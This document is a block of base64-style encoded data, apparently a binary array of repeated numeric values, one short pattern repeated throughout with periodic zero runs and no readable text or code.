fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fi